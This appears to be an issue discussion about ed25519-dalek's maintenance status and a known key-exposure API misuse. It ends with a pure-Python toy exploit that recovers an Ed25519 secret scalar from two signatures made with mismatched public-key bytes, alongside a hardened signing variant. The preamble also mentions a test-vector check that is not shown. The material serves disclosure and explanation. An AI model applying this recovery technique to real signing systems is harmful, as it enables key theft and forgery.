`ed25519-dalek` Status
This is a pretty important crate, and it would be sad if we had to flag it as informational: Unmaintained / Notice :sob:
NOTE: This does NOT necessarily mean the crypto in ed25519-dalek is inherently broken or insecure as of now.
e.g. depending on how we classify / see "broken" / "insecure": people often see a crypto failure where the pub API was not misused.
Nonetheless, the facts:
- 6,821,009 downloads all time, 12k per day
- Major downstream crates include `ed25519`, `libp2p-core`, `solana-runtime`, `solana-sdk`, `signatory`, `lettre`, ..
- The crate has not had a new publish in two years: https://crates.io/crates/ed25519-dalek
There may be a potential private key exposure that relies on public API misuse:
- https://github.com/dalek-cryptography/ed25519-dalek/issues/209
- with a PoC at https://github.com/MystenLabs/ed25519-unsafe-libs
- PR https://github.com/dalek-cryptography/ed25519-dalek/pull/205 from 30 June
Considering the above alone, it might be feasible to flag this as Unmaintained / Notice at least.
@tarcieri, could we ask @isislovecruft whether ed25519-dalek could be forked under RustCrypto or something, to get the maintenance back on track?
The crates `ed25519` and `signatory` are high-level downstream proxies for this.
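An added example, not code from the original issue and not ed25519-dalek's own code: a pure-Python toy model (RFC 8032 arithmetic; Python rather than Rust so it runs with no crate dependency) of the API-misuse class that the linked issue and PoC describe, as I understand them. The footgun is a signing function that takes the public key as a caller-supplied argument (the shape of `ExpandedSecretKey::sign(message, &public_key)`): if the same message is signed twice with the same expanded key but different public-key bytes, the deterministic nonce r is identical while the challenge k differs, and the two s values solve for the secret scalar. The seed, message and "wrong" public key below are constructed inputs; `sign_with_supplied_pubkey`, `sign_checked`, `recover_scalar` and `demo` are names I chose for this illustration, and the RFC 8032 test vector in the usage check is the standard Test 1 vector.

```python
"""Toy model of the "double public key" signing oracle against an Ed25519 API
that lets the caller supply the public key separately from the expanded secret
key. Pure-Python, follows RFC 8032; for illustration only, NOT for production."""
import hashlib

p = 2**255 - 19                                        # field prime
L = 2**252 + 27742317777372353535851937790883648493    # prime group order
d = (-121665 * pow(121666, -1, p)) % p                 # twisted Edwards constant
# Base point in extended coordinates (X, Y, Z, T); constants from RFC 8032.
Gx = 15112221349535400772501151409588531511454012693041857206046113283949847762202
Gy = 46316835694926478169428394003475163141307993866256225615783033603165251855960
G = (Gx, Gy, 1, Gx * Gy % p)


def point_add(P, Q):
    """RFC 8032 section 5.1.4 addition in extended coordinates."""
    A = (P[1] - P[0]) * (Q[1] - Q[0]) % p
    B = (P[1] + P[0]) * (Q[1] + Q[0]) % p
    C = 2 * P[3] * Q[3] * d % p
    D = 2 * P[2] * Q[2] % p
    E, F, GG, H = B - A, D - C, D + C, B + A
    return (E * F % p, GG * H % p, F * GG % p, E * H % p)


def point_mul(s, P):
    """Double-and-add scalar multiplication (not constant time; toy code)."""
    Q = (0, 1, 1, 0)  # neutral element
    while s:
        if s & 1:
            Q = point_add(Q, P)
        P = point_add(P, P)
        s >>= 1
    return Q


def compress(P):
    """32-byte little-endian y with the parity of x in the top bit."""
    zinv = pow(P[2], -1, p)
    x, y = P[0] * zinv % p, P[1] * zinv % p
    return (y | ((x & 1) << 255)).to_bytes(32, "little")


def sha512_int(*parts):
    return int.from_bytes(hashlib.sha512(b"".join(parts)).digest(), "little")


def expand(seed):
    """RFC 8032 key expansion: (clamped scalar a, 32-byte nonce prefix)."""
    h = hashlib.sha512(seed).digest()
    a = int.from_bytes(h[:32], "little")
    a &= (1 << 254) - 8   # clear the low 3 bits and bit 255
    a |= 1 << 254         # set bit 254
    return a, h[32:]


def public_key(a):
    return compress(point_mul(a, G))


def sign_with_supplied_pubkey(a, prefix, pub, msg):
    """Models an API where the CALLER chooses which public-key bytes are hashed
    into the challenge. Nothing here checks that pub == a*G."""
    r = sha512_int(prefix, msg) % L           # deterministic nonce: depends only on prefix and msg
    R = compress(point_mul(r, G))
    k = sha512_int(R, pub, msg) % L           # challenge: depends on the supplied pub
    s = (r + k * a) % L
    return R + s.to_bytes(32, "little")


def sign_checked(a, prefix, msg):
    """Hardened variant: the public key is derived from the secret inside the
    signing routine, so a caller cannot obtain two signatures sharing r with
    different k."""
    return sign_with_supplied_pubkey(a, prefix, public_key(a), msg)


def recover_scalar(sig1, pub1, sig2, pub2, msg):
    """Two signatures over the same msg that share R but were produced with
    different public-key bytes satisfy s1 - s2 = (k1 - k2) * a (mod L)."""
    R1, R2 = sig1[:32], sig2[:32]
    assert R1 == R2, "nonces differ; this oracle needs a shared R"
    s1 = int.from_bytes(sig1[32:], "little")
    s2 = int.from_bytes(sig2[32:], "little")
    k1 = sha512_int(R1, pub1, msg) % L
    k2 = sha512_int(R2, pub2, msg) % L
    return (s1 - s2) * pow((k1 - k2) % L, -1, L) % L


def demo(seed=b"\x11" * 32, msg=b"constructed sample message"):
    """Constructed scenario: one correct call and one call with wrong pub bytes.
    Returns True when the leaked scalar reproduces the victim's public key."""
    a, prefix = expand(seed)
    pub = public_key(a)
    wrong_pub = b"\x00" * 32                  # any bytes a confused caller might pass
    sig_ok = sign_with_supplied_pubkey(a, prefix, pub, msg)
    sig_bad = sign_with_supplied_pubkey(a, prefix, wrong_pub, msg)
    a_rec = recover_scalar(sig_ok, pub, sig_bad, wrong_pub, msg)
    # Only a mod L matters for signing, so a_rec is enough to forge as the victim.
    return a_rec == a % L and public_key(a_rec) == pub


if __name__ == "__main__":
    print("secret scalar recovered from two signatures:", demo())
```

Running the file prints `True`: the attacker needs no knowledge of the nonce prefix, only two signatures from a caller that passed mismatched public-key bytes. The `sign_checked` shape removes the parameter entirely, which is the fix direction rather than documenting "must pass the matching key".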